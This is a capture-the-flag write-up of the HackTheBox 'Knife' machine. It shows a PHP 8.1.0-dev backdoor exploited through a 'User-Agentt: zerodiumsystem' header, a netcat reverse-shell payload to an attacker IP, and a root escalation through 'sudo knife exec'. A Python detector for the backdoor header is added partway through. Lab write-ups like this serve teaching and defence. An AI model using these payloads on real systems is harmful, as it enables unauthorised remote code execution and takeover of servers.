HackTheBox - Knife

Written by Erik on
Easy-level Linux machine

Table of Contents

  1. Enumeration
  2. Exploitation
  3. Privilege Escalation

Enumeration:

Ports:

  • 22 ssh OpenSSH 8.2p1
  • 80 http Apache httpd 2.4.41 (Ubuntu)

Analyzing the website, we found that it runs a vulnerable PHP version. This vulnerability allows us to execute arbitrary code through the “User Agent”.

VULNERABILITY

  • Version: PHP 8.1.0-dev
  • RCE in “User Agent”
  • Source

Once we have found the vulnerability, we proceed to exploit it. We use BurpSuite to intercept a normal request to the server in our proxy.

We then add a “User-Agentt” header (note the double “t”), which gives us RCE on the server:

  • User-Agentt: zerodiumsystem('id');

Exploitation:

Having verified that it works, we now exploit it to get a reverse shell back to our machine.

  • I will use a Netcat reverse shell:
    User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.201 1234 >/tmp/f');
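
A defender-side check for the requests shown above, as an added example that is not part of the original writeup: it scans raw HTTP request heads for the misspelled User-Agentt header and the zerodium prefix seen in these payloads. The sample requests and the target.example host are constructed for illustration.

```python
# Header name and value prefix are taken from the requests shown in this writeup.
BACKDOOR_HEADER = "user-agentt"
TRIGGER_PREFIX = "zerodium"

def parse_headers(raw_request: str):
    """Return (request_line, [(name, value), ...]) from a raw HTTP/1.x request head."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:  # obsolete folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers

def inspect_request(raw_request: str):
    """Return a list of findings for one request; an empty list means no match."""
    request_line, headers = parse_headers(raw_request)
    findings = []
    for name, value in headers:
        if name.lower() != BACKDOOR_HEADER:  # header names are case-insensitive
            continue
        if value.lower().startswith(TRIGGER_PREFIX):
            # Keep the code that followed the prefix so responders can triage it.
            findings.append({"severity": "high", "request": request_line,
                             "reason": "backdoor trigger",
                             "code": value[len(TRIGGER_PREFIX):]})
        else:
            findings.append({"severity": "medium", "request": request_line,
                             "reason": "non-standard User-Agentt header",
                             "code": None})
    return findings

# Constructed sample requests (not captured traffic).
SAMPLES = [
    "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: target.example\r\nuser-agentt: probe\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        for finding in inspect_request(sample):
            print(finding)
```

Standard access logs do not record arbitrary request headers, so this kind of check needs full request capture, for example at a reverse proxy or WAF.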
    

Privilege Escalation:

User Flag

Looking at the user's permissions, we see that the user can run a binary as root:

  • /usr/bin/knife

Reading the binary's help manual, I found something that caught my attention: scripts could be executed with “exec”.

Now that we have found a way to execute commands as root, since scripts run through this binary are executed as root, we proceed to write a script that gives us a shell.

We use the following command and get root shell:

sudo /usr/bin/knife exec --exec "exec '/bin/bash'"

Root Flag

Machine Completed
